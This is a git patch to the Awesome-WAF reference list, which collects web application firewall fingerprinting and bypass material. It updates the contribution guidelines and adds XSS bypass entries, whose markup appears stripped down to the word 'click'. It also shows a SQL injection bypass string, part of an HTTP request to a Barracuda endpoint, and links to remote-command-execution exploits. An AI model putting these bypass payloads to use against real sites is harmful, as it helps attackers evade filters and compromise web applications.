From b0fbde4da960e7494934355c78a7e11140789ad4 Mon Sep 17 00:00:00 2001 From: 0xInfection Date: Wed, 13 Mar 2019 13:07:27 +0530 Subject: [PATCH] Added some more stuffs --- CONTRIBUTING.md | 9 ++++++--- README.md | 31 +++++++++++++++++++++++++++++-- 2 files changed, 35 insertions(+), 5 deletions(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 2bbea29..bef49cb 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -22,7 +22,10 @@ __Your pull request/commit message will be a tweet, please keep that in mind.__ [Awesome-WAF](https://github.com/0xinfection/awesome-waf) is a hand-crafted list for high-quality information about web application firewalls and its resources. Following items are recommended to be kept in mind. -- Each item should be limited to one link, no duplicates, no redirection (careful with `http` vs `https`!). +- If you are submitting a new fingerprint, include the headers/page source, etc. +- Do not include the URL as it may expose the integrity of the site. +> I will contact you personally if necessary via email. +- Item you're adding should not be duplicate, no redirection (be careful with `http` vs `https`!). - The link should be the name of the slide or project or website. - Description should be clear and concise (read it out loud to be sure). - Description should follow the link, on the same line. @@ -37,14 +40,14 @@ We'll guide you to the best of our abilities. To be on the list, it would be *nice* if entries adhere to these quality standards: -- Generally useful to the community +- Generally useful to the community. - Clearly stating "what is it for": mention the problem it solves. Just try your best, make it clear for the next person. - Solves a real problem (even a small one) - If your PR is a **WIP** (work in progress, not safe for production), mention it. If your PR is not merged, I will tell you why so that you may be able to improve it. -## Awesome Related Contribution Guidelines +## Contribution Guidelines ### Adding to this List diff --git a/README.md b/README.md index af3ff2c..860c7ba 100644 --- a/README.md +++ b/README.md @@ -247,8 +247,19 @@ Wanna fingerprint WAFs? Lets see how.
  • Detectability: Moderate
  • Detection Methodology:
  • @@ -2141,8 +2152,16 @@ Before anything else, you should hone up skills from [Google Dorks Cheat Sheet]( ``` <--` --!> ``` +- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v) +``` +click +``` ### Comodo +- XSS Bypass by [@s0md3v](https://twiiter.com/s0md3v) +``` +click +``` - SQLi by [@WAFNinja](https://waf.ninja) ``` 0 union/**/select 1,version(),@@datadir @@ -2161,6 +2180,10 @@ GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&co Host: favoritewaf.com User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT) ``` +- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v) +``` +click +``` - [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#) - [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479) @@ -2207,6 +2230,10 @@ Keep-Alive: 300 ``` +- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v) +``` +